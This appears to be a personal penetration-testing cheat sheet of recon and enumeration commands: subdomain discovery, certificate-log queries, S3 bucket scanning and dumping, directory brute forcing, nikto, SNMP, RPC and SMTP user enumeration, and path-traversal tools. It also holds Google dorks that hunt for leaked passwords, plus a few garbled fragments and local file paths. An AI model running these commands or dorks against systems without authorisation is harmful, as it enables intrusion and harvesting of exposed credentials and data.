## ----------------------------------------------------------- ##
##   [?] WAFW00F - Web Application Firewall Detection Tool
## ----------------------------------------------------------- ##
wafw00f $Domain


arachni http://$TARGET --report-save-path=$ARACHNI_REPORT_DIR/$TARGET --output-only-positives --scope-include-subdomains


## ------------------------------------------------- ##
##   [+] Xprobe2 OS fingerprinting
## ------------------------------------------------- ##
##   [?] fuzzy signature matching to provide
##       the probable operating system assessment
## ------------------------------------------------- ##
xprobe2 $IP

xprobe2 -v -p tcp:80:open $IP
xprobe2 -v -p tcp:80:open 192.168.6.66


xprobe2 -v -p tcp:80:open 192.168.6.66


iptraf -i "wlan0"


## Cloud Google Dorks
site:*.amazonaws.com -www "compute"
site:*.amazonaws.com -www "compute" "ap-south-1"
site:pastebin.com "rds.amazonaws.com" "u " pass OR password

# AWS Buckets Dork
site:*.s3.amazonaws.com ext:xls | ext:xlsx | ext:csv password|passwd|pass user|username|uid|email


cloud_enum.py -k companynameorkeyword

AWSBucketDump.py -l $File.txt
python AWSBucketDump.py -D -l BucketNames.txt -g s.txt

php s3-buckets-bruteforcer.php --bucket gwen001-test002

s3scanner.py --include-closed --out-file $File.txt --dump $File.txt


aws sts get-caller-identity
aws s3 ls
aws s3 ls s3://bucket.com
aws s3 ls --recursive s3://bucket.com
aws iam get-account-password-policy
aws sts get-session-token


##-============================-##
##  [+] OSINT + Recon Scans:
##-============================-##
sniper -t $Target -o -re

##-==========================================-##
##  [+] OSINT + Recon Scans [Stealth Mode]
##-==========================================-##
sniper -t $Target -m stealth -o -re

##-=====================-##
##  [+] Discover mode
##-=====================-##
sniper -t $CIDR -m discover -w $Workspace

##-========================-##
##  [+] Scan $Port only
##-========================-##
sniper -t $Target -m p -p $Port


sniper -t $Target

sniper -t $Target

sniper -t $Target


##-============================-##
##  [+]
##-============================-##
amass enum -list


##-============================-##
##  [+]
##-============================-##
amass enum -src -ip -d $URL


##-============================-##
##  [+]
##-============================-##
amass enum -src -brute -d $Domain -o $File


##-============================-##
##  [+]
##-============================-##
amass intel -whois -ip -src -d $Domain -o $File


##-========================================-##
##  [+] Passively Search For Subdomains:
##-========================================-##
amass enum -passive -d $Domain -src


##-=====================================-##
##  [+] Active Subdomain Bruteforcing:
##-=====================================-##
amass enum -active -d $Domain -brute -w $File -src -ip -dir $Dir -config $File -o $File


##-=========================-##
##  [+] DNS Enumeration:
##-=========================-##
amass enum -v -src -ip -brute -min-for-recursive 2 d $Domain


##-=====================================-##
##  [+] Visualize Enumeration Results:
##-=====================================-##


##-===================================================-##
##  [+] Visualize Enumeration Results Using Maltego:
##-===================================================-##
amass viz -maltego


##-========================================-##
##  [+] Discover Targets for Enumeration:
##-========================================-##
amass intel -d $Domain


amass intel -d $Domain -whois


amass intel -org '$OrgName'


amass intel -active -asn $ASN -ip


photon -u $Domain -l 3 -t 100


EyeWitness --web --single $Domain
EyeWitness --web -f $File -d $Dir/


## --------------------------------------------- ##
##  [?] Enumerates a domain for DNS entries
## --------------------------------------------- ##
dnsdict6 -4 -d -t 16 -e -x $Domain


sslscan $ip:443
sslscan --ipv4 --show-certificate --ssl2 --ssl3 --tlsall --no-colour $Domain


echo "Please provide the target ip address and the port."

sslscan --show-certificate --verbose --no-colour --xml=sslscan_$1_$2.xml $1:$2 2>&1 | tee "$1_$2_sslscan.txt"


sslyze $Domain --resume --certinfo=basic --compression --reneg --sslv2 --sslv3

sslyze -regular $Domain


tlssled $Domain 443

sslyze $domain --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers


httprint -h $Domain -s $File.txt -P0


## ------------------------------------------------- ##
##   [+] Harvesting subdomains with assetfinder...
## ------------------------------------------------- ##
assetfinder $URL | grep '.$URL' | sort -u | tee -a $File.txt


assetfinder -subs-only $target > $subs_dir/assetfinder.txt

findomain -u $subs_dir/findomain.txt -t $target

sublist3r -v -d $target -o $subs_dir/sublist3r.txt
sed -i 's/<BR>/\n/g' $subs_dir/sublist3r.txt
sort $subs_dir/sublist3r.txt | uniq > $subs_dir/sublist3r-fl.txt

subfinder -d $target -o $subs_dir/subfinder.txt -config $config_dir/subfinder-config.yaml

amass enum  --passive -d $target -config $config_dir/amass-config.ini -o $subs_dir/amass.txt


findomain -q -f /$Dir/$File -r -u findomain_domains.txt


amass enum -df /$Dir/$File -passive -o amass_passive_domains.txt
subfinder -dL /$Dir/$File -o subfinder_domains.txt


cat domains.txt | httprobe -c 50 -t 3000 >$File.txt

cat alive.txt | aquatone -silent --ports xlarge -out $Dir/ -scan-timeout 500 -screenshot-timeout 50000 -http-timeout 6000

dirsearch.py -E -t 50 --plain-text $Dir/$File -u $host -w /$Dir/$File.txt | grep Target


amass -active -brute -o $File.txt -d $Domain


performing reconnaissance on domain names
subdomain dictionary brute force


cat $File.txt | aquatone

cat $File.xml | aquatone -nmap

cat $File.txt | aquatone -ports large

cat $File.txt | aquatone -ports 80,443,3000,3001


 | aquatone -debug
 | aquatone -http-timeout
 | aquatone -proxy
 | aquatone -out
 | aquatone -save-body
 | aquatone -scan-timeout
 | aquatone -threads
 | aquatone -template-path
 | aquatone -silent
 | aquatone -session
 | aquatone -screenshot-timeout
 | aquatone -resolution


SNMP
----
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt
Metasploit Module snmp_enum
snmpcheck -t snmpservice


## --------------------------------------------------------------------- ##
##   [+] Double checking for subdomains with amass and certspotter...
## --------------------------------------------------------------------- ##
amass enum -d $URL | tee -a $URL/recon/$File.txt
curl -s https://certspotter.com/api/v0/certs\?domain\=$URL | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u
certspotter | tee -a $URL/recon/$File.txt


[+]certspotter
        curl https://certspotter.com/api/v0/certs\?domain\=$1 | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | uniq
    [+]crtsh
        curl -s https://crt.sh/?q=%.$1  | sed 's/<\/\?[^>]\+>//g' | grep $1


#!/bin/bash
echo "[+] Start gather subdomain "
for i in `cat list.txt`
do
curl -s https://crt.sh/\?q\=$i\&output\=json | jq -r '.[].name_value'|sed 's/\*\.//g'|sort -u |tee -a domains.txt
done
echo "[+] httprope "
cat domains.txt |httprobe|tee live-domain.txt
echo "[+] End "


https://whois.arin.net
http://viewdns.info/
https://hunter.io/
https://www.zoomeye.org/
https://greynoise.io/
https://shodan.io/
https://censys.io/


https://api.certspotter.com/
https://crt.sh/
https://api.sublist3r.com/
https://www.dshield.org/api/
http://apidocs.emergingthreats.net/
https://api.hackerone.com/docs/v1
https://pastebin.com/api
https://www.ssllabs.com/projects/ssllabs-apis/
https://developer.shodan.io/
https://cloud.tenable.com/api#/overview
https://urlscan.io/about-api/
https://www.virustotal.com/en/documentation/public-api/
https://www.threatminer.org/api.php

http://asnlookup.com/api


https://urlhaus-api.abuse.ch/


http://isc.sans.edu/api/ip/
https://isc.sans.edu/api/ipdetails/


getSubdomains(){
    curl -s "https://otx.alienvault.com/api/v1/indicators/domain/$1/passive_dns" | jq -r ".passive_dns[].hostname" | sort -u > tmp.txt &
    curl -s "https://jldc.me/anubis/subdomains/$1" | jq -r '.' | cut -d '"' -f2 | cut -d '[' -f1 | cut -d ']' -f1 | grep . | sort -u >> tmp.txt &
    curl -s "http://web.archive.org/cdx/search/cdx?url=*.$1/*&output=text&fl=original&collapse=urlkey" | sort | sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sort -u >> tmp.txt &
    curl -s "https://certspotter.com/api/v0/certs?domain=$1" | jq '.[].dns_names[]' 2> /dev/null | sed 's/\"//g' | sed 's/\*\.//g' | grep -w $1\$ | sort -u >> tmp.txt &
    curl -s "https://crt.sh/?q=%.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u >> tmp.txt &
    curl -s "https://dns.bufferover.run/dns?q=.$1" | jq -r .FDNS_A[] 2>/dev/null | cut -d ',' -f2 | grep -o "\w.*$1" | sort -u >> tmp.txt &
    curl -s "https://dns.bufferover.run/dns?q=.$1" | jq -r .RDNS[] 2>/dev/null | cut -d ',' -f2 | grep -o "\w.*$1" | sort -u >> tmp.txt &
    curl -s "https://tls.bufferover.run/dns?q=.$1" | jq -r .Results 2>/dev/null | cut -d ',' -f3 | grep -o "\w.*$1"| sort -u >> tmp.txt &
    curl -s "https://api.hackertarget.com/hostsearch/?q=$1" | cut -d ',' -f1 | sort -u >> tmp.txt &
    curl -s "https://rapiddns.io/subdomain/$1?full=1#result" | grep -oaEi "https?://[^\"\\'> ]+" | grep $1 | sed 's/https\?:\/\///' | cut -d "/" -f3 | sort -u >> tmp.txt &
    curl -s "https://riddler.io/search/exportcsv?q=pld:$1" | grep -o "\w.*$1" | cut -d ',' -f6 | sort -u >> tmp.txt &
    curl -s "https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=$1" | jq '.subdomains' | cut -d '"' -f2 | cut -d '[' -f1 | cut -d ']' -f1 | grep . | sort -u >> tmp.txt &
    curl -s "https://api.threatminer.org/v2/domain.php?q=$1&rt=5" | jq -r '.results[]' | sort -u >> tmp.txt &
    curl -s "https://urlscan.io/api/v1/search/?q=domain:$1" | jq -r '.results[].page.domain' | sort -u >> tmp.txt &
    curl -s "https://www.virustotal.com/ui/domains/$1/subdomains?limit=40" | grep '"id":' | cut -d '"' -f4 | sort -u >> tmp.txt &
    csrftoken=$(curl -ILs https://dnsdumpster.com | grep csrftoken | cut -d " " -f2 | cut -d "=" -f2 | tr -d ";")
    curl -s --header "Host:dnsdumpster.com" --referer https://dnsdumpster.com --user-agent "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" --data "csrfmiddlewaretoken=$csrftoken&targetip=$1" --cookie "csrftoken=$csrftoken; _ga=GA1.2.1737013576.1458811829; _gat=1" https://dnsdumpster.com >> dnsdumpster.html
    if [[ -e $1 && -s $1 ]]; then # file exists and is not zero size
        cat dnsdumpster.html | grep "https://api.hackertarget.com/httpheaders" | grep -o "\w.*$1" | cut -d "/" -f7 | grep '.' | sort -u >> tmp.txt
    fi


curl -s "https://certspotter.com/api/v0/certs?domain=$1" | jq '.[].dns_names[]' 2> /dev/null | sed 's/\"//g' | sed 's/\*\.//g' | grep -w $1\$ | sort -u >> tmp.txt &
curl -s "https://crt.sh/?q=%.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

dnsdumpster.com

censys.io/domain?q=
censys.io/certificates?q=


curl -s "https://www.virustotal.com/ui/domains/$1/subdomains?limit=40" | grep '"id":' | cut -d '"' -f4 | sort -u

curl https://www.virustotal.com/en/domain/$target/information/ -H 'Host: www.virustotal.com' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -m 30 | grep information | grep "$target" | awk '{print $3}' | sed 's/\// /g' | awk '{print $4}' >> /tmp/onlineFoundSubdomains


https://api.hackertarget.com/pagelinks/?q=
https://api.hackertarget.com/hostsearch/?q=


curl https://api.hackertarget.com/findshareddns/?q=$hostname --connect-timeout 15
curl https://api.hackertarget.com/nmap/?q=$hostname --connect-timeout 15
curl https://api.hackertarget.com/geoip/?q=$hostname --connect-timeout 15
curl https://api.hackertarget.com/zonetransfer/?q=$hostname --connect-timeout 15
curl https://api.hackertarget.com/httpheaders/?q=$hostname --connect-timeout 15
curl https://api.hackertarget.com/hostsearch/?q=$hostname --connect-timeout 15
curl https://api.hackertarget.com/dnslookup/?q=$hostname --connect-timeout 15
curl https://api.hackertarget.com/reversedns/?q=$ip --connect-timeout 15

curl -s "https://api.hackertarget.com/hostsearch/?q=$1" | cut -d ',' -f1 | sort -u

curl http://api.hackertarget.com/hostsearch/?q=$target -m 30 | sed 's/,/ /' | awk '{print $1}' | grep "$target" >> /tmp/onlineFoundSubdomains


openssl req -new -newkey rsa:4096 -sha256 -x509 -days 365 -nodes -out spiderfoot.crt -keyout spiderfoot.key -subj "/CN=localhost"

chmod 600 spiderfoot.crt
chmod 600 spiderfoot.key


spyse -target $Target --subdomains


Get Autonomous System details
echo "AS15169" | spysecli as

Get IPv4 host details
echo "8.8.8.8" | spysecli ip

Reverse IP lookup
echo "8.8.8.8" | spysecli reverse-ip

Reverse NS lookup
echo "ns1.google.com" | spysecli reverse-ns

Subdomains lookup
echo "tesla.com" | spysecli subdomains


curl -s https://crt.sh/?q=%25.$Target

Get historical DNS A records
echo "google.com" | spysecli history-dns-a

Get historical DNS NS records
echo "google.com" | spysecli history-dns-ns

https://censys.io/api


findomain -q -f /mainData/$File -r -u findomain_domains.txt


amass enum -df /mainData/$File -passive -o ammas_passive_domains.txt
subfinder -dL /mainData/$File -o subfinder_domains.txt


cat domains.txt | httprobe -c 50 -t 3000 >alive.txt

cat alive.txt | aquatone -silent --ports xlarge -out $Path/aquatone/ -scan-timeout 500 -screenshot-timeout 50000 -http-timeout 6000

dirsearch.py -E -t 50 --plain-text dirsearch/$dirsearch_file -u $host -w /tools/dirsearch/db/dicc.txt | grep Target


amass -active -brute -o $hosts.txt -d $Domain

cat hosts.txt | aquatone

cat scan.xml | aquatone -nmap


curl -fsSL https://api.mullvad.net/www/accounts/


Generate a new pair of keys via wg

wg genkey | tee privatekey | wg pubkey > publickey


Upload the newly generate key to Mullvad

curl https://api.mullvad.net/wg/ -d account=YOUR_ACCOUNT_NUMBER --data-urlencode pubkey=`cat publickey`


##-=====================================-##ccc
##      [+]  DShield  -  Internet Storm Center API
##-=====================================-##
https://www.dshield.org/api/


 l. ccccccccccccccccccccccccccccccccccc


## ---------------------------------------------------------- ##
##   [+] Harvesting full 3rd lvl domains with sublist3r...
## ---------------------------------------------------------- ##
for domain in $(cat $url/recon/3rd-lvl-domains.txt);do sublist3r -d $domain -o $url/recon/3rd-lvls/$domain.txt;done

## ------------------------------------- ##
##  [+] Probing for alive domains...
## ------------------------------------- ##
cat $url/recon/final.txt | sort -u | httprobe -s -p https:443 | sed 's/https\?:\/\///' | tr -d ':443' >> $url/recon/httprobe/alive.txt


sublist3r -d $Domain

sublist3r -d $Domain --verbose --bruteforce

sublist3r -d $Target -vvv -o $Dir/domains-sublist3r-$Target.txt


subfinder -d $Domain

subfinder -d $Domain -t 100 -v


subfinder -o $Dir/domains-subfinder-$Target.txt -b -d $Target -w $Domains DEFAULT -t 100


subfinder -d $Domain | httpx -status-code


subfinder -d $Domain | httpx -title -tech-detect -status-code -title -follow-redirects


subjack -w $url/recon/httprobe/alive.txt -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3


dnscan.py --domain $Domain --wordlist $File


dnscan -d $Target -w $Domains QUICK -o $Dir/domains-dnscan-$Target.txt


## --------------------------------- ##
##  [+] Scraping wayback data...
## --------------------------------- ##
cat $url/recon/final.txt | waybackurls | tee -a  $url/recon/wayback/wayback_output1.txt


cat domains.txt | waybackurls > urls


inurlbr.php --dork "site:$Target" -s inurlbr-$Target


urlcrazy -k $Layout -i -o $Location $URL


EyeWitness --web -f $url/recon/httprobe/alive.txt -d $url/recon/eyewitness --resolve


## ----------------------------------- ##
###  [?] whatweb - Vulnerable Scan
## ----------------------------------- ##
whatweb $IP


##-======================================================-##
##  [+] scan a website and show the results on screen:
##-======================================================-##
golismero.py scan $Target


##-=========================================================================-##
##  [+] grab Nmap results, scan all hosts found and write an HTML report:
##-=========================================================================-##
golismero.py scan -i $File.xml -o $File.html


##-===================================================================================-##
##  [+] grab results from OpenVAS and show them on screen, but dont scan anything:
##-===================================================================================-##
golismero.py import -i $File.xml


golismero scan 10.0.0.0/24 172.16.0.0/24 $Target


##-============================================================-##
##  [+] show a list of all available configuration profiles:
##-============================================================-##
golismero.py profiles


##-=============================================-##
##  [+] show a list of all available plugins:
##-=============================================-##
golismero.py plugins


##-=============================-##
##  [+] Custom plugins setup:

golismero.py scan -e spider -e plecost -e dns* $Target


##-===========================-##
##  [+] Plugin parameters:
##-===========================-##
golismero.py scan -a openvas:port=9182 -a openvas:user=tor $Target
golismero.py scan -a openvas:profile=“My new profile” $Target


##-===============================-##
##  [+] increasing debug level:
##-===============================-##
golismero.py scan -nd -vv $Target


##-===================================================-##
##  [+] dump the database from a previous scan:
##-===================================================-##
golismero.py dump -db $File.db -o $File.sql


nikto -h $IP -p 1234 $IP
nikto -C all -h 192.168.1.1 -p 80
nikto -C all -h 192.168.1.1 -p 443


nikto -h $IP -p $PORT


## ---------------------------------------------------- ##
##   [+] Proxy Enumeration (useful for open proxies)
## ---------------------------------------------------- ##
nikto -useproxy http://$IP:3128 -h $IP


nikto -Option USERAGENT=Mozilla -url=http://10.11.1.24  -o nikto.txt

nikto -port 80,443 -host $ip -o -v nikto.txt

nikto -host $IP -C all -p 80 -output $File.txt | grep -v Cookie


nikto -h $Domain -port 443 -Format htm --output $Domain.htm


dotdotpwn.pl -m http -h $IP -M GET -o unix


## ------------------------ ##
##  [+] Url brute force
## ------------------------ ##
dirb http://$IP -r -o dirb-$IP.txt

dirb http://"$1"/ | tee /tmp/results/$1/$1-dirb-$port.txt

dirb http://10.0.0.165/ /usr/share/wordlist/dirb/big.txt

list-urls.py $Domain


## ------------------------- ##
##  [+] Directory Fuzzing
## ------------------------- ##
dirb $Domain /usr/share/wordlists/dirb/big.txt -o $File.txt
gobuster -u $Domain -w /usr/share/wordlists/dirb/big.txt -t 100


## ----------------------------------------------- ##
##  [?] A for loop so you can go do other stuff
## ----------------------------------------------- ##
for wordlist in $(ls);do gobuster -u $Domain -w $File -t 100;done


gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip
gobuster -u http://$IP/  -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
gobuster -u http://$IP/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s '200,204,403,500' -e
gobuster dir -u https://10.11.1.35 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -t 50 -k -o gobuster


    gobuster -u http://10.0.0.165/
    -w /usr/share/wordlist/dirb/big.txt
    -s '200,204,301,302,307,403,500'
    -e


dirsearch -u http://$IP/ -e .php


whatweb -v $domain > data/$File_/analysis/dynamic/domain_info.txt


## --------------------------------------- ##
##   [?] identifies all known services
## --------------------------------------- ##
whatweb $IP

whatweb $ip:80 --color=never --log-brief="whattheweb.txt"


##-======================================-##
##  [+] whatweb - Pulling plugins data
##-======================================-##
whatweb --info-plugins -t 50 -v $Domain >> $File.txt


##-=============================================-##
##  [+] whatweb - Running whatweb on $Domain
##-=============================================-##
whatweb -t 50 -v $Domain >> $File.txt


dirsearch -u $Domain -e php


 HTTP Enumeration

dirsearch big.txt -e sh,txt,htm,php,cgi,html,pl,bak,old


wfuzz -c -z $File.txt --sc 200 http://$IP


##-===========================-##
##  [+] Skipfish Scanning:
##-===========================-##
## ---------------------------------------------- ##
##  skipfish -m     time threads
##  skipfish -LVY   do not update after result
## ---------------------------------------------- ##
skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://$IP


## --------------------------- ##
##   [?] follow redirects
##   [?] set user-agent
##   [?] set method - GET
## --------------------------- ##
curl -Iks --location -X GET -A "x-agent" $Domain


## --------------------------------- ##
##   [?] Use Proxy for connection
## --------------------------------- ##
curl -Iks --location -X GET -A "x-agent" --proxy http://127.0.0.1:4444 $Domain
curl -Iks --location -X GET -A "x-agent" --proxy socks5://127.0.0.1:9050 $Domain
curl -Iks --location -X GET -A "x-agent" --proxy socks5://127.0.0.1:1080 $Domain


##
grep "href=" index.html


##  extract domain names from the file
grep "href=" index.html | cut -d "/" -f 3


##
grep "href=" index.html | cut -d "/" -‐f 3 | grep "\."


##
grep "href=" index.html |cut ‐d "/" ‐f 3 | grep "\." | cut ‐d '"' ‐f 1


##
grep "href=" index.html | cut ‐d  "/" ‐f  3 | grep "\." | cut ‐d '"' ‐f 1 | sort ‐u


##
for url in $(cat list.txt); do host $url; done


##
for url in $(cat list.txt); do host $url; done | grep "has address" | cut -d " " -f 4 | sort -u


## refine the output - sort the data by the number of times
## each IP address accessed the server.
cat access.log | cut -‐d " " ‐f 1 | sort | uniq -‐c | sort -urn


##-=====================================-##
##  [+] Check for title and all links
##-=====================================-##
curl $IP -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'


##-===================================================-##
##  [+] Extract all the lines that contain a string
##-===================================================-##
grep "href=" index.html


##-==============================================================-##
##  [+] Cut a string by a delimiter, filter results then sort
##-==============================================================-##
grep "href=" index.html | cut -d "/" -f 3 | grep "\\." | cut -d '"' -f 1 | sort -u


##-====================================-##
##  [+] Grep regex output to a file
##-====================================-##
cat index.html | grep -o 'http://\[^"\]\*' | cut -d "/" -f 3 | sort –u > $OutFile.txt


##-===============================================-##
##   [+] NFS (Network File System) Enumeration
##-===============================================-##


##-=================================-##
##  [+] Show Mountable NFS Shares
##-=================================-##
nmap -sV --script=nfs-showmount $IP


##-===============================================-##
##  [+] RPC (Remote Procedure Call) Enumeration
##-===============================================-##


##-================================-##
##  [+] Connect to an RPC share
##-================================-##

## ----------------------------------------------------------------- ##
##   [?] without a username and password and enumerate privledges
## ----------------------------------------------------------------- ##
rpcclient --user="" --command=enumprivs -N $IP


## ----------------------------------------------------------------------- ##
##  [+] Connect to an RPC share with a username and enumerate privledges
## ----------------------------------------------------------------------- ##
rpcclient --user="$User" --command=enumprivs $IP


enum4linux $IP

enum4linux $IP | grep "user:" |cut -d "[" -f2 | cut -d "]" -f1


httsquash -r $Domain

httprint -h $Domain -s signatures.txt -P0


snmpcheck -t $IP -c public

snmpenum -t $IP


##-============================-##
##  [+] SNMPv3 Enumeration
##-============================-##
nmap -sV -p 161 --script=snmp-info $IP/24


## ---------------------------------------------------------- ##
## [+]  Enumerate MIB:
## ---------------------------------------------------------- ##
## [•]  1.3.6.1.2.1.25.1.6.0      ## System Processes
## [•]  1.3.6.1.2.1.25.4.2.1.2        ## Running Programs
## [•]  1.3.6.1.2.1.25.4.2.1.4        ## Processes Path
## [•]  1.3.6.1.2.1.25.2.3.1.4        ## Storage Units
## [•]  1.3.6.1.2.1.25.6.3.1.2        ## Software Name
## [•]  1.3.6.1.4.1.77.1.2.25     ## User Accounts
## [•]  1.3.6.1.2.1.6.13.1.3      ## TCP Local Ports


snmpwalk -c public -v1 $IP 1

Snmpwalk -c <community string> -v<version> $IP 1.3.6.1.2.1.25.4.2.1.2

onesixtyone -c names -i hosts

onesixtyone -d $IP


nmap -sU --open -p 161 $1
nmap -n -Pn -sV $IP -p $IP --script=snmp-netstat,snmp-processes -oN $OUTPUT/$IP:$PORT_snmp.nmap
onesixtyone -c public $IP | tee $OUTPUT/161_$IP-$PORT
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt -dd $1 2>&1 | tee "snmp_onesixtyone_$1.txt"


snmpwalk -c public -v1 $IP | tee $OUTPUT/snmpwalk_$IP-$PORT
snmpwalk -c public -v1 $IP 1.3.6.1.4.1.77.1.2.25 | tee $OUTPUT/snmp_users_$IP-$PORT
snmpwalk -c public -v1 $IP 1.3.6.1.2.1.6.13.1.3 | tee $OUTPUT/snmp_ports_$IP-$PORT
snmpwalk -c public -v1 $IP 1.3.6.1.2.1.25.4.2.1.2 | tee $OUTPUT/snmp_process_$IP-$PORT
snmpwalk -c public -v1 $IP 1.3.6.1.2.1.25.6.3.1.2 | tee $OUTPUT/snmp_software_$IP-$PORT


snmpwalk -c public -v 1 $1 2>&1 | tee "snmpwalk.txt"
snmpwalk -c public -v 1 $1 1.3.6.1.2.1.25.1.6.0 2>&1 | tee "snmpwalk_system_processes.txt"
snmpwalk -c public -v 1 $1 1.3.6.1.2.1.25.4.2.1.2 2>&1 | tee "snmpwalk_running_processes.txt"
snmpwalk -c public -v 1 $1 1.3.6.1.2.1.25.4.2.1.4 2>&1 | tee "snmpwalk_process_paths.txt"
snmpwalk -c public -v 1 $1 1.3.6.1.2.1.25.2.3.1.4 2>&1 | tee "snmpwalk_storage_units.txt"
snmpwalk -c public -v 1 $1 1.3.6.1.2.1.25.6.3.1.2 2>&1 | tee "snmpwalk_software_names.txt"
snmpwalk -c public -v 1 $1 1.3.6.1.4.1.77.1.2.25 2>&1 | tee "snmpwalk_user_accounts.txt"
snmpwalk -c public -v 1 $1 1.3.6.1.2.1.6.13.1.3 2>&1 | tee "snmpwalk_tcp_ports.txt"


##-===========================================================-##
##  [+] SnmpWalk - start browsing through the
##                 MIB (management information base) tree.
##-===========================================================-##
snmpwalk -c public -v1 $IP


##-======================================================================-##
##  [+] extract only system users use this value 1.3.6.1.4.1.77.1.2.25,
##-======================================================================-##
snmpwalk -c public -v1 $IP <MIB value>

snmpwalk public -v1 $IP 1 |grep 77.1.2.25 |cut -d” “ -f4


## --------------------------------- ##
##  [+] Enumerating Windows Users:
## --------------------------------- ##
snmpwalk -c public -v1 $IP 1.3 |grep 77.1.2.25 |cut -d" " -f4


## ------------------------------------- ##
##  [+] Enumerating Running Services
## ------------------------------------- ##
snmpwalk -c public -v1 $IP 1 |grep hrSWRunName|cut -d" " -f4


## -------------------------------------- ##
##  [+] Enumerating installed software
## -------------------------------------- ##
snmpwalk -c public -v1 $IP 1 |grep hrSWInstalledName


## ----------------------------------- ##
##  [+] Enumerating open TCP ports
## ----------------------------------- ##
snmpwalk -c public -v1 $IP 1 |grep tcpConnState |cut -d"." -f6 |sort -nu


snmpbulkwalk -v 2 -c public IP


snmpget -v 1 -c public IP version


/home/parrotsec-kiosk/Downloads/Xe1phix-ParrotSec-Kiosk-Project-GitLab-Production-Development-[Archiving-Workstation]/Xe1phix-[Pastebin]/OPEXXX/snmp-process-sniper.sh
/home/parrotsec-kiosk/Downloads/Xe1phix-ParrotSec-Kiosk-Project-GitLab-Production-Development-[Archiving-Workstation]/Xe1phix-[Scripts]/OSINT/Reconnoitre/Reconnoitre/lib/snmp_walk.py
/home/parrotsec-kiosk/Downloads/Xe1phix-ParrotSec-Kiosk-Project-GitLab-Production-Development-[Archiving-Workstation]/Xe1phix-[Scripts]/PenTestKit/snmp
/home/parrotsec-kiosk/Downloads/Xe1phix-ParrotSec-Kiosk-Project-GitLab-Production-Development-[Archiving-Workstation]/Xe1phix-[Scripts]/PenTestKit/snmp/community.lst
/home/parrotsec-kiosk/Downloads/Xe1phix-ParrotSec-Kiosk-Project-GitLab-Production-Development-[Archiving-Workstation]/Xe1phix-[Scripts]/PenTestKit/snmp/discover.sh
/home/parrotsec-kiosk/Downloads/Xe1phix-ParrotSec-Kiosk-Project-GitLab-Production-Development-[Archiving-Workstation]/Xe1phix-[Scripts]/PenTestKit/snmp/scan.sh
/home/parrotsec-kiosk/Downloads/Xe1phix-ParrotSec-Kiosk-Project-GitLab-Production-Development-[Archiving-Workstation]/Xe1phix-[Scripts]/PenTestKit/snmp/walk.sh
/home/parrotsec-kiosk/Downloads/Xe1phix-ParrotSec-Kiosk-Project-GitLab-Production-Development-[Archiving-Workstation]/Xe1phix-[Scripts]/STIG-4-Debian/scripts/check-snmp.sh
/home/parrotsec-kiosk/Downloads/Xe1phix-ParrotSec-Kiosk-Project-GitLab-Production-Development-[Archiving-Workstation]/Xe1phix-[Scripts]/lynis/include/tests_snmp
/home/parrotsec-kiosk/Downloads/Xe1phix-ParrotSec-Kiosk-Project-GitLab-Production-Development-[Archiving-Workstation]/Xe1phix-[Wiki]/Kali-learning-notes.wiki/snmp.md
/home/parrotsec-kiosk/Downloads/Xe1phix-ParrotSec-Kiosk-Project-GitLab-Production-Development-[Archiving-Workstation]/Xe1phix-[Wiki]/cheatsheets/snmpwalk


#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    #SSL Implementation (testssl)
    #++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    echo -e "\n===================\nTestssl Log:\n===================\n" >> data/$File_/analysis/dynamic/ssl_scan/logs/testssl.log
    echo `date` >> data/$File_/analysis/dynamic/ssl_scan/logs/testssl.log
    echo -e "   ${no_color}[-] ${brown}Scanning ${blue}$domain ${brown}${no_color}" >> data/$File_/analysis/dynamic/ssl_scan/logs/testssl.log
    cd tools/testssl.sh/
testssl.sh -U -R -I -E -H -S -P -e -p -f -4  --sneaky --logfile ../../data/$File_/analysis/dynamic/ssl_scan/ssl_detailed.txt $domain | aha > ../../data/$File_/analysis/dynamic/ssl_scan/ssl_detailed.html
testssl.sh -U -R -I -E -H -S -P -e -p -f -4  --sneaky --logfile ../../data/domain_scans/$dump/ssl_detailed.txt $domain


    echo -e "   ${no_color}[-] ${brown}Domain scanning completed ${no_color}" >> ../../data/$File_/analysis/dynamic/ssl_scan/logs/testssl.log


testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $IP


##-============================================-##
##  [+] Get Options available from web server
##-============================================-##
curl -vX OPTIONS $Domain


##-=====================================-##
##  [+] Check for title and all links
##-=====================================-##
curl $domain -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'


##-=============================-##
##  [+]
##-=============================-##
fimap -u "http://INSERTIPADDRESS/example.php?test="


##-=============================-##
##  [+]
##-=============================-##
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $IP
>use auxiliary/scanner/smtp/smtp_enum

VRFY root
EXPN root

##-=============================-##
##  [+]
##-=============================-##
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip


##-=============================-##
##  [+]
##-=============================-##
smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t $IP -p $PORT


